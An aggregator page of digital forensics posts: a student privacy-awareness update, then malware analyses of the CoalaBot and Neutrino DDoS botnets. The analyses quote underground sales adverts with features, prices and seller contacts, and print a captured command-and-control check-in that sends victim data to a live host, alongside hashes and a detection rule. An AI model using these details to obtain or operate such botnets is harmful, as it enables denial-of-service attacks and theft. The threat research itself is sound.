Forensic Blogs

An aggregator for digital forensics blogs

by

The Vermont Privacy Project

As the internet ties in more and more with our daily lives, internet privacy has become a big concern. The Vermont Privacy Breach project at the Leahy Center is a team of students working with a Champlain student supervisor and a Leahy Center Fellow Judy Boyd to try and tackle this growing issue. Our goal is to reduce the number of privacy incidents on residents of the State of Vermont. We plan to accomplish this by providing simple resources. Small businesses, local governments, and nonprofits can then use these to make themselves more secure. 

What We Have Accomplished?

Over the course of the semester, the team has been hard at work researching privacy breaches and other data. The plan is to use this data to create simple presentations that can be given to businesses and people alike. Our team extensively researched what a data privacy breach is, who it affects, and how to prevent them. We all put our research into a shared Google Drive folder and refined the scope of the project. We focused on teaching and presenting to others what privacy breaches were and how to prevent them. Phase One of this project encompassed common risks, the impact of breaches on individuals and organizations, and measures to prevent or mitigate risk. At this point, we are currently in the process of creating an initial presentation outlining Phase One of this project.

What is a Data Breach? A laptop with a skull and crossbones over it

A data breach is any unauthorized access into a business, state agency, or individual’s digital systems. These attacks can come in a large variety of ways, and each come with their own challenges. For example, phishing attacks will look like messages sent from a company but trick you into putting in your info so the attacker can use it themselves. Ransomware and malware are other forms of attacks. These are programs that are downloaded onto the machine that can read files, edit them, or even lock out the entire computer. Then there are attacks that try to overload your connection to the internet, called DDoS attacks, which flood your connection with junk information. 

These are all incredibly dangerous and serious issues for anybody with a computer, and as technology advances, we’re finding those computers in everyday objects. If you have any sort of wireless surveillance in your home, that could become a risk. But, by limiting who has access to your devices and watching what you download, you bring that risk down considerably. The steps to better computer safety are simple, anybody can do them, it’s just a matter of spreading that information. Therefore, we’re excited to have the opportunity to work on that goal and help those in our community and elsewhere.

What’s Next?

The next steps of our project are to finalize and practice our Phase One Presentation and prepare for our first presentation. We are really looking forward to collaborating with the Burlington Sunrise Rotary Club. It’s exciting to see the progress we have made with this project and we hope to see a glimpse of what may come next. For Phase Two of this project, we will be looking at privacy risks related to Local Government agencies, non-profits, and small businesses. For example, we’re interested in how we can bring this to more people.

Stay up to date with the Leahy Center by following us on LinkedIn, Twitter, Instagram, and Facebook!

The post The Vermont Privacy Project appeared first on The Leahy Center for Digital Forensics & Cybersecurity.

by

CoalaBot : http Ddos Bot

CoalaBot appears to be build on August Stealer code (Panel and Traffic are really alike)

I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one HilltopAds malvertising.

2017-09-11: a witnessed infection chain to CoalaBot

A look inside :
CoalaBot: Login Screen
(August Stealer alike) 



CoalaBot: Statistics

CoalaBot: Bots

CoalaBot: TasksCoalaBot: Tasks

CoalaBot: New Taks (list)


CoalaBot: https get task details
CoalaBot: http post task details


CoalaBot: SettingsHere is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.
(Thanks to Andrew Komarov and others who provided help here).
------------------------------------------
Coala Http Ddos Bot
The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.
Attack types:• ICMP (PING) FLOOD• UDP FLOOD• TCP FLOOD• HTTP ARME• HTTP GET *• HTTP POST *• HTTP SLOWLORIS *• HTTP PULSE WAVE *
* - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.

Binary:• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)• ~100kb after obfuscation• Auto Backup (optional)• Low CPU load for efficient use• Encryption of incoming/outgoing traffic• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.• Ability to link a build to more than one gate.
Panel:• Detailed statistics on time online/architecture/etc. • List of bots, detailed information• Number count of requests per second (total/for each bot)• Creation of groups for attacks• Auto sorting of bots by groups • Creation of tasks, the ability to choose by group/country• Setting an optional time for bots success rate
Other:
• Providing macros for randomization of sent data • Support of .onion gate• Ability to install an additional layer (BOT => LAYER => MAIN GATE)

Requirements:
• PHP 5.6 or higher• MySQL• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensions
Screenshots:
• Statistics- http://i.imgur.com/FUevsaS.jpg• Bots - http://i.imgur.com/nDwl9pY.jpg• Created tasks - http://i.imgur.com/RltiDhl.png• Task List - http://i.imgur.com/tqEEpX0.jpg• Settings - http://i.imgur.com/EbhExjE.jpg

Price:
• $300 - build and panel. Up to 3 gates for one build.• $20 - rebuildThe price can vary depending on updates.Escrow service is welcome.
Help with installation is no charge.------------------------------------------

Sample:

VT link
MD5 f3862c311c67cb027a06d4272b680a3b
SHA1 0ff1584eec4fc5c72439d94e8cee922703c44049
SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08f

Emerging Threats rules :
2024531 || ET TROJAN MSIL/CoalaBot CnC Activity

Read More:
August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

by

Neutrino Bot (aka MS:Win32/Kasidet)

Neutrino Bot (aka MS:Win32/Kasidet)

Advertised on underground by n3utrino since december 2013 Neutrino Bot is another "HTTP stress testing tool" , read DDos Bot.

Piece of the advert

Here is the text of one Advert :
------------------------------------------
Neutrino Bot

- Основной функционал
* HTTP(S) флуд ( методы GETPOST )
* AntiDDOS флуд ( Эмуляция jsкуки )
* Slowloris флуд
* Download флуд
* TCP флуд
* UDP флуд


* Лоадер ( exe, dll, vbs, bat ... + возможность указать параметры для запуска файла)
* Кейлоггер (Multilanguage) (поддержка виртуальных клавиатур (снятие скриншотов в области клика размером 60х60)) ( Возможность слежения за указанным окном )
* Command shell ( удалённое выполнение команд с помощью командного интерпретатора windows)
* Стилинг файлов по маске ( кошельков bitcoin к примеру )
* Запуск браузера с переходом по указанной ссылке ( aka накрутчик просмотров)
* Подмена Hosts
* Стиллинг Win ключей
* Размножение ( USBArchive )
* Определение чистоты загрузок ( количество найденных "соседей" на компьютере )
* Определение установленного АВ ( на всех ОС Windows кроме серверных )
* Обновление
* Работа через прокладки

- Дополнительные функции
* Антиотладка
* AntiVM
* Детект песочниц
* Детект всех онлайн сервисов автоматического анализа
* BotKiller

* Защита бота ( защита процессафайлаветок реестра )
* Неограниченное количество одновременно выполняемых команд ( Некоторые команды имеют более высокий приоритет по отношению к другим и их выполнение останавливает другие )
* Неограниченное количество резервных доменов
* Тихая работа даже под ограниченной учётной записью
* Не нагружает CPU

- Функционал админки
* Гибкая система создания заданий
* Подробная статистика по ботам
* Возможность отдавать команды каждому боту или стране отдельно
* Настраиваемое время отстука ботов
* Сортировка ботов в стате по IPОнлайнуСтранеOS
* Система банов.

- Вес несжатого бинарника ~ 50kb ( ЯП - C )
- Бот протестирован на всей линейке Windows, от XP до 8.1 (x32/64)

Ценники -
Полный комплект ( админка + бот + билд на неограниченное кол-во доменов ) - 200$
Ребилд ( также неогр. кол-во доменов ) - 10$
Обновление ( функциональное ) - 20$
Билдер - 550$
Оплата - WM BTC Perfect

Бинарник лицензирован, слив - остаётесь без поддержки.

-Контакты
ПМ или n3utrino@kaddafi.me / n3utrino@xmpp.jp

Справка по командамПодробное описание функционала - http://n3utrino.blog.com/

P.S. Бот никакого отношения к одноимённой связке не имеет.
------------------------------------------
Google Translated as :
------------------------------------------
Neutrino Bot 

- The main functional 
* HTTP (S) flood (methods GET POST) 
* AntiDDOS flood (Emulation js cookies) 
* Slowloris flood 
* Download flood 
* TCP flood 
* UDP flood 


* Loader (exe, dll, vbs, bat ... + can specify parameters for running the file) 
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window) 
* Command shell (remote command execution using shell windows) 
* Stealing files by mask (eg bitcoin wallets) 
* Launch the browser with one of these links (aka Cheaters views) 
* Spoofing Hosts 
* Stilling Win keys 
* Reproduction (USB Archive) 
* Purity downloads (number found "neighbors" on the computer) 
* Identifying the installed AV (on all Windows except Server) 
* Update 
* Work through the gasket 

- Additional Features 
* Anti debugging 
* AntiVM 
* Detect sandboxes 
* Detect all online services automatic analysis 
* BotKiller 

* Bot protection (protection process file registry branches) 
* Unlimited number of concurrent commands (Some teams have a higher priority than others, and their execution stops others) 
* Unlimited number of backup domain 
* Quiet operation even under a limited account 
* Do not load the CPU 

- Functional admin 
* Flexible system for creating jobs 
* Detailed statistics for bots 
* Ability to give commands to each country separately or bot 
* Customizable otstuk bots 
* Sort bots in Articles IP Live Country OS 
* System Bans. 

- Weight uncompressed binary file ~ 50kb (PL - C) 
- Boat tested on the entire line of Windows, from XP to 8.1 (x32/64) 

tags - 
Full set (+ bot + admin panel to build an unlimited number of domains) - $ 200 
Rebuild (also unlim. Quantity domains) - $ 10 
Update (functional) - $ 20 
Builder - $ 550 
Payment - WM BTC Perfect 

Binary licensed, plums - are left without support. 

-Contact 
PM or n3utrino@kaddafi.me / n3utrino@xmpp.jp 

Command Help Detailed functional - http://n3utrino.blog.com/ 

P.S. Boat no relation to the same name does not have a bunch.
------------------------------------------
As you can see it's advertised in the open :

N3utrino Blog - InformationN3utrino blog - Price
N3utrino blog - Screenshots
Screenshots provided by the coder on the blog and in forums :

Neutrino - Index
Neutrino - Clients
Neutrino - Clients 2


Neutrino - Stats
Neutrino - Stats 2Coder also provided the panel on underground.

piece of the Neutrino  panel code.

I met one of those bot (v2.5 - dab012115fa267d95c1145a1eb41d38d ) as a second stage of an Andromeda pushed in Nuclear Pack (the one featured here)

Here is Neutrino calling back home (cf attached pcap) :

http://nav1111sto.mcdir.ru/modopo/tasks.phpPOST /modopo/tasks.php HTTP/1.0
Host: nav1111sto.mcdir.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Content-type: application/x-www-form-urlencoded
Cookie: session=21232f297a57a5a743894a0e4a801fc3
Content-length: 8

ping=1

http://nav1111sto.mcdir.ru/modopo/tasks.phpPOST /modopo/tasks.php HTTP/1.0
Host: nav1111sto.mcdir.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Content-type: application/x-www-form-urlencoded
Cookie: session=21232f297a57a5a743894a0e4a801fc3
Content-length: 137

getcmd=1&uid=D2BDB99374A80FB8&os=Windows+XP+PRO+(x32)&av=Not+installed&nat=yes&version=2.5&serial=DFW32-R7WFG-[redacted]-[redacted]-777GD&quality=0Files : Pcap - Panel (as v2.1) - Bot v2.5
Hashes :  dab012115fa267d95c1145a1eb41d38d (2.5)
bb42fce5d9cb73561ec4e3c343c10d52  (2.1)
e6ea45deca7e9dd9afeb276ec1d4509c (2.0)
ce5c86fb4c44a7655ed6caaf42a688b3 2.6 - Pushed in Infinity - 2014-06-19 

Read more :
Barclays Transaction Notification contains "Neutrino Downloader" - 2014-04-10 - Kimberly - StopMalvertising
Post Publication Reading :
A Glance Into the Neutrino Botnet - 2014-06-23 - Umesh Wanve - McAfee